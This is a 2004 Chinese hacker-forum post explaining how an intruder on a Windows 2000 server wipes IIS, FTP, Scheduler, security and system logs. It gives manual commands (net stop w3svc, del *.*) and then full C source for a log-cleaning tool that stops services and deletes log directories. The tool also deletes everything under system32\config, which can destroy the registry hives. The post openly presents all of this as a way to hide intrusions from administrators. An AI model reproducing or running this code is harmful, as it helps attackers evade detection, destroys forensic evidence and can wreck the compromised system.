20CN网络安全小组论坛 - 编程破解 - 一个2000的日志清除器是怎么练成的z

论坛: 编程破解标题: 一个2000的日志清除器是怎么练成的z

作者: abctm [abctm]

版主

一个2000的日志清除器是怎么练成的

我想大想一定用过小榕的CLeanIIsLog,是一个不错的日志清除工具。不过可惜，只
能清除IIS的日志，那ftp和shedule待产生的日志文件呢，我们一般只能手动清除。
Windows2000的日志文件通常有应用程序日志，安全日志、系统日志、DNS服务器日志、
FTP日志、WWW日志等等，可能会根据服务器所开启的服务不同。

一般步骤如下:
1.清除IIs的日志。
可不要小看IIS的日志功能，它可以详细的记录下你的入侵全过程,如
如你用unicode入侵时ie里打的命令，和对80端口扫描时留下的痕迹。你可能就因为对
其不注意，而被网管盯上，说不定还会.......呵呵
那我们就可手动清除吧
1.日志的默认位置：%systemroot%\system32\logfiles\w3svc1\，默认每天一个日志
那我们就切换到这个目录下吧
del *.*
你大概想是安全了吧，那就dir一下吧
咦,咦,今天的日志怎么还在，不要慌。因为w3svc服务还开着，那我们怎么清除这个日志文件呢?
方法一:如有3389可以登录,那就用notepad打开，把Ctrl+A 然后del吧。
方法二:net 命令
C:\>net stop w3svc
World Wide Web Publishing Service 服务正在停止.(可能会等很长的时间，也可能不成功)
World Wide Web Publishing Service 服务已成功停止。
好了w3svc停止了，我们可以清空它的日志了,del *.*吧
还有不要忘了再打开w3svc服务呀
C:\>net start w3svc
2.清除ftp日志。
FTP日志默认位置：%systemroot%\sys tem32\logfiles\msftpsvc1\，默认每天一个日志
清除方法同上
3.清除Scheduler日志
Scheduler服务日志默认位置：%systemroot%\schedlgu.txt
清除方法同上
4.应用程序日志、安全日志、系统日志、DNS日志默认位置：%systemroot%\sys tem32\config
清除方法同上

注意以上三个目录可能不在上面的位置，那是因为管理员做的修改
可以读取注册表值得到他们的位置
应用程序日志，安全日志，系统日志，DNS服务器日志，它们这些LOG文件在注册表中的：
HKEY_LOCAL_MACHINE\sys tem\CurrentControlSet\Services\Eventlog
Schedluler服务日志在注册表中
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent

5.我是借鉴了别人文章(其实就是抄了)
OK！恭喜，现在简单的日志都已成功删除。下面就是很难的安全日志和系统日志了，守护这些日志的服务是Event Log，试着停掉它！
D:\SERVER\sys tem32\LogFiles\W3SVC1>net stop eventlog
这项服务无法接受请求的 "暂停" 或 "停止" 操作。
KAO，I　服了 U，没办法，它是关键服务。如果不用第三方工具，在命令行上根本没有删除安全日志和系统日志的可能！所以还是得用虽然简单但是速度慢得死机的办法：打开“控制面板”的“管理工具”中的“事件查看器”（98没有，知道用Win2k的好处了吧），在菜单的“操作”项有一个名为“连接到另一台计算机”的菜单，点击它如下图所示：

输入远程计算机的IP，然后点支烟，等上数十分钟，忍受象死机的折磨，然后打开下图：

选择远程计算机的安全性日志，右键选择它的属性：

点击属性里的“清除日志”按钮，OK！安全日志清除完毕！同样的忍受痛苦去清除系统日志！

6.上面大部分重要的日志你都已经清除了。然后要做的就是以防万一还有遗漏的了。
那就这样做吧 del以下的一些文件
\winnt\*.log
system32下
\logfiles\*.*
\dtclog\*.*
\config\*.evt
\*.log
\*.txt

到目前为止，我所知的大部分的日志我们已经教会了你清除的方法,那你就学以致用吧。

其实这篇文章的主要日的，不是教你怎么清除日志，而是教你写一个日志清除的工具。
就当我前面说的都是屁话吧。

现在转入正题:
前面你已经看到了要清除全部的日志的过程，是不是很繁呀，手动可是要花不少时间。有时
候还不一定可以清除干净。那就于编程的朋友来说，那就会想，可以我会编程，我怕什么。
那我们就动手吧。

你已经了解了，要清除一些日志，首先要关闭一些服务程序
那我就先教你怎么写一个可以看机器的服务程序的dos小工具吧，具体实现看我以前的文章
《如果做一个dos下的服务程序查看器》
工具名serName.exe
运行一下serName.exe吧
serName.exe -t 1 -t 1
呵呵，所有的机器正在运行的服务程序显示出来了吧。
记住你要关的服务程序名吧，下面会有用的。

那编程的第二步就是实现关w3svc和shedule还有ftp等服务程序了。
我写的代码如下
对着msdn慢慢看吧。(不难的，有什么不懂不要来问我)

void StopServices(LPCTSTR lpServiceName)
{
SC_HANDLE scman = ::OpenSCManager(NULL,NULL,SC_MANAGER_ENUMERATE_SERVICE);
if(scman)
{
SC_HANDLE sh = ::OpenService(scman,lpServiceName,SERVICE_STOP);
if(sh)
{
BOOL bControl;
SERVICE_STATUS ServiceStatus;
bControl=ControlService(sh,SERVICE_CONTROL_STOP,&ServiceStatus);
DWORD dwControl;
if(bControl)
{
printf("success to stop the service \"%s\"\n",lpServiceName);
}
else
{
dwControl=::GetLastError();
switch(dwControl){
case ERROR_ACCESS_DENIED :printf("The specified handle was not opened with the necessary access.\n");break;
case ERROR_SERVICE_NOT_ACTIVE :printf("The service has not been started.\n");break;
case ERROR_DEPENDENT_SERVICES_RUNNING :printf("The service cannot be stopped because other running services are dependent on it.\n");break;
case ERROR_INVALID_SERVICE_CONTROL:printf("The requested control code is not valid, or it is unacceptable to the service.\n");break;
case ERROR_SERVICE_CANNOT_ACCEPT_CTRL:printf("The requested control code cannot be sent to the service because the state of the service is SERVICE_STOPPED, SERVICE_START_PENDING, or SERVICE_STOP_PENDING.\n");break;
case ERROR_SERVICE_REQUEST_TIMEOUT:printf("The service did not respond to the start request in a timely fashion.\n");break;
}
}

}
::CloseServiceHandle(sh);
}
::CloseServiceHandle(scman);
return;

}

函数有了，那就写个main函数试试吧
void main()
{
StopServices("W3SVC");
return;
}

ok.成功了,如果没有成功，请参照输出的错误提示。
好了有了一个可以停止的服务程序的函数，

那我们还需要一个可以开启服务程序的函数
其实以上的看懂了，下面的代码只是对上面的代码的一些小变动。

void StartServices(LPCTSTR lpServiceName)
{
SC_HANDLE scman = ::OpenSCManager(NULL,NULL,SC_MANAGER_ENUMERATE_SERVICE);
if(scman)
{
SC_HANDLE sh = ::OpenService(scman,lpServiceName,SERVICE_START);
if(sh)
{
BOOL bControl;
bControl=StartService(sh,1,&lpServiceName);
DWORD dwControl;
if(bControl)
{
printf("success to start the service \"%s\"\n",lpServiceName);
}
else
{
dwControl=::GetLastError();
switch(dwControl){
case ERROR_ACCESS_DENIED :printf("The specified handle was not opened with SERVICE_START access.\n");break;
case ERROR_INVALID_HANDLE :printf("The specified handle is invalid.\n");break;
case ERROR_PATH_NOT_FOUND :printf("The service binary file could not be found.\n");break;
case ERROR_SERVICE_ALREADY_RUNNING:printf("An instance of the service is already running.\n");break;
case ERROR_SERVICE_DATABASE_LOCKED:printf("The database is locked.\n");break;
case ERROR_SERVICE_DEPENDENCY_DELETED:printf("The service depends on a service that does not exist or has been marked for deletion.\n");break;
case ERROR_SERVICE_DEPENDENCY_FAIL:printf("The service depends on another service that has failed to start.\n");break;
case ERROR_SERVICE_DISABLED:printf("The service has been disabled.\n");break;
case ERROR_SERVICE_LOGON_FAILED:printf("The service could not be logged on.\n");break;
case ERROR_SERVICE_MARKED_FOR_DELETE:printf("The service has been marked for deletion.\n");break;
case ERROR_SERVICE_NO_THREAD:printf("A thread could not be created for the service.\n");break;
case ERROR_SERVICE_REQUEST_TIMEOUT:printf("The service did not respond to the start request in a timely fashion.\n");break;
}
}

}
::CloseServiceHandle(sh);
}
::CloseServiceHandle(scman);
return;

}

呵呵，只是一些小变动。
现在你已经有了这两样武器，那下面的就是动用上面第一部分的一些知识，去del文件了，我想不用我教，你也一定想到怎么做了吧。

现在那再教第三个武器吧，虽然他对我们的程序可有可无，但对一个漂亮的程序他却是必需的，那就是一个判断服务程序状态的函数。

我的代码如下。

DWORD GetServicesState(LPCTSTR lpServiceName)
{
DWORD dwState;
SC_HANDLE scman = ::OpenSCManager(NULL,NULL,SC_MANAGER_ENUMERATE_SERVICE);
if(scman)
{
SC_HANDLE sh = ::OpenService(scman,lpServiceName,SERVICE_QUERY_STATUS);
if(sh)
{
BOOL bQuery;
SERVICE_STATUS ServiceStatus;
bQuery=QueryServiceStatus(sh,&ServiceStatus);
if(!bQuery)
{
DWORD dwControl;
dwControl=::GetLastError();
switch(dwControl){
case ERROR_ACCESS_DENIED :printf("The specified handle was not opened with SERVICE_QUERY_STATUS access.\n");break;
case ERROR_INVALID_HANDLE :printf("The specified handle is invalid.\n");break;
}
dwState=0;
}
else
{
dwState=ServiceStatus.dwCurrentState;

}

}
::CloseServiceHandle(sh);
}
::CloseServiceHandle(scman);
return dwState;

}

好了现在什么都有了，那就把代码完成吧。
其他代码如下。希望你在运行前安照你入侵的系统的具体情况修改一下源代码。

//==========================================================//
// 绿兵日志Cleaner1.0 //
// Compiled by http://www.vertarmy.com 绿色兵团 //
// http://vcghost.yeah.net 编の魂(tryibest) //
// tjhacker@163.com //
// //
//==========================================================//
#include "windows.h"
#include "stdio.h"

void StopServices(LPCTSTR lpServiceName);
void StartServices(LPCTSTR lpServiceName);
DWORD GetServicesState(LPCTSTR lpServiceName);
void DelFiles(LPCTSTR lpFileName,LPCTSTR lpDirectory);
void Del3WFile();
void DelFtpFile();
void DelSheduleFile();
void DelOtherFile();
void ShowTitle();
void main(int argc, char *argv[])
{
ShowTitle();
DelOtherFile();
Del3WFile();
DelFtpFile();
DelSheduleFile();
ShowTitle();
return;
}

void StopServices(LPCTSTR lpServiceName)
{
SC_HANDLE scman = ::OpenSCManager(NULL,NULL,SC_MANAGER_ENUMERATE_SERVICE);
if(scman)
{
SC_HANDLE sh = ::OpenService(scman,lpServiceName,SERVICE_STOP);
if(sh)
{
BOOL bControl;
SERVICE_STATUS ServiceStatus;
bControl=ControlService(sh,SERVICE_CONTROL_STOP,&ServiceStatus);
DWORD dwControl;
if(bControl)
{
printf("success to stop the service \"%s\"\n",lpServiceName);
}
else
{
dwControl=::GetLastError();
switch(dwControl){
case ERROR_ACCESS_DENIED :printf("The specified handle was not opened with the necessary access.\n");break;
case ERROR_SERVICE_NOT_ACTIVE :printf("The service has not been started.\n");break;
case ERROR_DEPENDENT_SERVICES_RUNNING :printf("The service cannot be stopped because other running services are dependent on it.\n");break;
case ERROR_INVALID_SERVICE_CONTROL:printf("The requested control code is not valid, or it is unacceptable to the service.\n");break;
case ERROR_SERVICE_CANNOT_ACCEPT_CTRL:printf("The requested control code cannot be sent to the service because the state of the service is SERVICE_STOPPED, SERVICE_START_PENDING, or SERVICE_STOP_PENDING.\n");break;
case ERROR_SERVICE_REQUEST_TIMEOUT:printf("The service did not respond to the start request in a timely fashion.\n");break;
}
}

}
::CloseServiceHandle(sh);
}
::CloseServiceHandle(scman);
return;

}

void StartServices(LPCTSTR lpServiceName)
{
SC_HANDLE scman = ::OpenSCManager(NULL,NULL,SC_MANAGER_ENUMERATE_SERVICE);
if(scman)
{
SC_HANDLE sh = ::OpenService(scman,lpServiceName,SERVICE_START);
if(sh)
{
BOOL bControl;
bControl=StartService(sh,1,&lpServiceName);
DWORD dwControl;
if(bControl)
{
printf("success to start the service \"%s\"\n",lpServiceName);
}
else
{
dwControl=::GetLastError();
switch(dwControl){
case ERROR_ACCESS_DENIED :printf("The specified handle was not opened with SERVICE_START access.\n");break;
case ERROR_INVALID_HANDLE :printf("The specified handle is invalid.\n");break;
case ERROR_PATH_NOT_FOUND :printf("The service binary file could not be found.\n");break;
case ERROR_SERVICE_ALREADY_RUNNING:printf("An instance of the service is already running.\n");break;
case ERROR_SERVICE_DATABASE_LOCKED:printf("The database is locked.\n");break;
case ERROR_SERVICE_DEPENDENCY_DELETED:printf("The service depends on a service that does not exist or has been marked for deletion.\n");break;
case ERROR_SERVICE_DEPENDENCY_FAIL:printf("The service depends on another service that has failed to start.\n");break;
case ERROR_SERVICE_DISABLED:printf("The service has been disabled.\n");break;
case ERROR_SERVICE_LOGON_FAILED:printf("The service could not be logged on.\n");break;
case ERROR_SERVICE_MARKED_FOR_DELETE:printf("The service has been marked for deletion.\n");break;
case ERROR_SERVICE_NO_THREAD:printf("A thread could not be created for the service.\n");break;
case ERROR_SERVICE_REQUEST_TIMEOUT:printf("The service did not respond to the start request in a timely fashion.\n");break;
}
}

}
::CloseServiceHandle(sh);
}
::CloseServiceHandle(scman);
return;

}

DWORD GetServicesState(LPCTSTR lpServiceName)
{
DWORD dwState;
SC_HANDLE scman = ::OpenSCManager(NULL,NULL,SC_MANAGER_ENUMERATE_SERVICE);
if(scman)
{
SC_HANDLE sh = ::OpenService(scman,lpServiceName,SERVICE_QUERY_STATUS);
if(sh)
{
BOOL bQuery;
SERVICE_STATUS ServiceStatus;
bQuery=QueryServiceStatus(sh,&ServiceStatus);
if(!bQuery)
{
DWORD dwControl;
dwControl=::GetLastError();
switch(dwControl){
case ERROR_ACCESS_DENIED :printf("The specified handle was not opened with SERVICE_QUERY_STATUS access.\n");break;
case ERROR_INVALID_HANDLE :printf("The specified handle is invalid.\n");break;
}
dwState=0;
}
else
{
dwState=ServiceStatus.dwCurrentState;

}

}
::CloseServiceHandle(sh);
}
::CloseServiceHandle(scman);
return dwState;

}

void DelFiles(LPCTSTR lpFileName,LPCTSTR lpDirectory)
{
TCHAR tcFileName[1024];
HANDLE hFile;
WIN32_FIND_DATA FindFileData;
hFile=FindFirstFile(lpFileName,&FindFileData);
if(hFile!=INVALID_HANDLE_VALUE)
{

while(1)
{
lstrcpy(tcFileName,lpDirectory);
lstrcat(tcFileName,FindFileData.cFileName);
BOOL dDel=DeleteFile(tcFileName);
if(dDel)
{
printf("delete file \"%s\" success\n",tcFileName);
}
else
{
printf("delte file \"%s\" fail\n",tcFileName);
}
if(!FindNextFile(hFile,&FindFileData))
{

break;
}
}

}
FindClose(hFile);

}

void Del3WFile()
{
TCHAR tcSystemDirectory[1024];
::GetSystemDirectory(tcSystemDirectory,1024);
TCHAR tc3WDirectory[1024];
TCHAR tc3WFile[1024];
lstrcpy(tc3WDirectory,tcSystemDirectory);
lstrcpy(tc3WFile,tcSystemDirectory);
lstrcat(tc3WFile,"\\logfiles\\w3svc1\\*.log");
lstrcat(tc3WDirectory,"\\logfiles\\w3svc1\\");
DWORD dwState;
dwState=GetServicesState("w3svc");
if(dwState==SERVICE_RUNNING)
{
StopServices("w3svc");
::Sleep(1000);
DelFiles(tc3WFile,tc3WDirectory);
::Sleep(1000);//应该考虑用线程
StartServices("w3svc");

}
else
{
DelFiles(tc3WFile,tc3WDirectory);
}
}

void DelFtpFile()
{
TCHAR tcSystemDirectory[1024];
::GetSystemDirectory(tcSystemDirectory,1024);
TCHAR tcFtpDirectory[1024];
TCHAR tcFtpFile[1024];
lstrcpy(tcFtpDirectory,tcSystemDirectory);
lstrcpy(tcFtpFile,tcSystemDirectory);
lstrcat(tcFtpFile,"\\logfiles\\msftpsvc1\\*.log");
lstrcat(tcFtpDirectory,"\\logfiles\\msftpsvc1\\");
DWORD dwState;
dwState=GetServicesState("msftpsvc");
if(dwState==SERVICE_RUNNING)
{
StopServices("msftpsvc");
::Sleep(1000);
DelFiles(tcFtpFile,tcFtpDirectory);
::Sleep(1000);//应该考虑用线程
StartServices("msftpsvc");

}
else
{
DelFiles(tcFtpFile,tcFtpDirectory);
}

}

void DelSheduleFile()
{
TCHAR tcSystemDirectory[1024];
::GetSystemDirectory(tcSystemDirectory,1024);
TCHAR tcScheduleFile[1024];
lstrcpy(tcScheduleFile,tcSystemDirectory);
int iLength=lstrlen(tcScheduleFile);
while(1)
{
iLength--;

if(tcScheduleFile[iLength]==\\)
break;
}
tcScheduleFile[iLength]=\0;
lstrcat(tcScheduleFile,"\\SchedLgU.txt");
DWORD dwState;
dwState=GetServicesState("schedule");
if(dwState==SERVICE_RUNNING)
{
StopServices("schedule");
::Sleep(1000);
BOOL dDel=DeleteFile(tcScheduleFile);
if(dDel)
{
printf("delete file \"%s\" success\n",tcScheduleFile);
}
else
{
printf("delte file \"%s\" fail\n",tcScheduleFile);
}
// DelFiles(tcScheduleFile,tcScheduleDirectory);
::Sleep(1000);//应该考虑用线程
StartServices("schedule");

}
else
{
BOOL dDel=DeleteFile(tcScheduleFile);
if(dDel)
{
printf("delete file \"%s\" success\n",tcScheduleFile);
}
else
{
printf("delte file \"%s\" fail\n",tcScheduleFile);
}
// DelFiles(tcScheduleFile,tcScheduleDirectory);
}
}

void DelOtherFile()
{
TCHAR tcSystemDirectory[1024];
::GetSystemDirectory(tcSystemDirectory,1024);
TCHAR tcOtherFile[1024];
TCHAR tcOtherDirectory[1024];
//删除logfiles下全部文件
lstrcpy(tcOtherFile,tcSystemDirectory);
lstrcpy(tcOtherDirectory,tcSystemDirectory);
lstrcat(tcOtherFile,"\\logfiles\\*.*");
lstrcat(tcOtherDirectory,"\\logfiles\\");
DelFiles(tcOtherFile,tcOtherDirectory);
//删除dtclog下全部文件
lstrcpy(tcOtherFile,tcSystemDirectory);
lstrcpy(tcOtherDirectory,tcSystemDirectory);
lstrcat(tcOtherFile,"\\dtclog\\*.*");
lstrcat(tcOtherDirectory,"\\dtclog\\");
DelFiles(tcOtherFile,tcOtherDirectory);
//删除config下全部文件
lstrcpy(tcOtherFile,tcSystemDirectory);
lstrcpy(tcOtherDirectory,tcSystemDirectory);
lstrcat(tcOtherFile,"\\config\\*.*");
lstrcat(tcOtherDirectory,"\\config\\");
DelFiles(tcOtherFile,tcOtherDirectory);
//删除system32下全部log文件
lstrcpy(tcOtherFile,tcSystemDirectory);
lstrcpy(tcOtherDirectory,tcSystemDirectory);
lstrcat(tcOtherFile,"\\*.log");
lstrcat(tcOtherDirectory,"\\");
DelFiles(tcOtherFile,tcOtherDirectory);
//删除system32下全部的txt文件
lstrcpy(tcOtherFile,tcSystemDirectory);
lstrcpy(tcOtherDirectory,tcSystemDirectory);
lstrcat(tcOtherFile,"\\*.txt");
lstrcat(tcOtherDirectory,"\\");
DelFiles(tcOtherFile,tcOtherDirectory);
//得到\winnt\目录路径
TCHAR tcWinDirectory[1024];
lstrcpy(tcWinDirectory,tcSystemDirectory);
int iLength=lstrlen(tcWinDirectory);
while(1)
{
iLength--;

if(tcWinDirectory[iLength]==\\)
break;
}
tcWinDirectory[iLength]=\0;
//删除\winnt\*.log
lstrcpy(tcOtherFile,tcWinDirectory);
lstrcpy(tcOtherDirectory,tcWinDirectory);
lstrcat(tcOtherFile,"\\*.log");
lstrcat(tcOtherDirectory,"\\");
DelFiles(tcOtherFile,tcOtherDirectory);

//删除\winnt\*.txt
lstrcpy(tcOtherFile,tcWinDirectory);
lstrcpy(tcOtherDirectory,tcWinDirectory);
lstrcat(tcOtherFile,"\\*.txt");
lstrcat(tcOtherDirectory,"\\");
DelFiles(tcOtherFile,tcOtherDirectory);

}

void ShowTitle()
{
printf("===========================================================\n");
printf("$ 绿兵日志Cleaner1.0 $\n");
printf("$ Compiled by http://www.vertarmy.com 绿色兵团 $\n");
printf("$ http://vcghost.yeah.net 编の魂(tryibest) $\n");
printf("$ tjhacker@163.com $\n");
printf("===========================================================\n");

}

地主发表时间: 04-02-11 06:39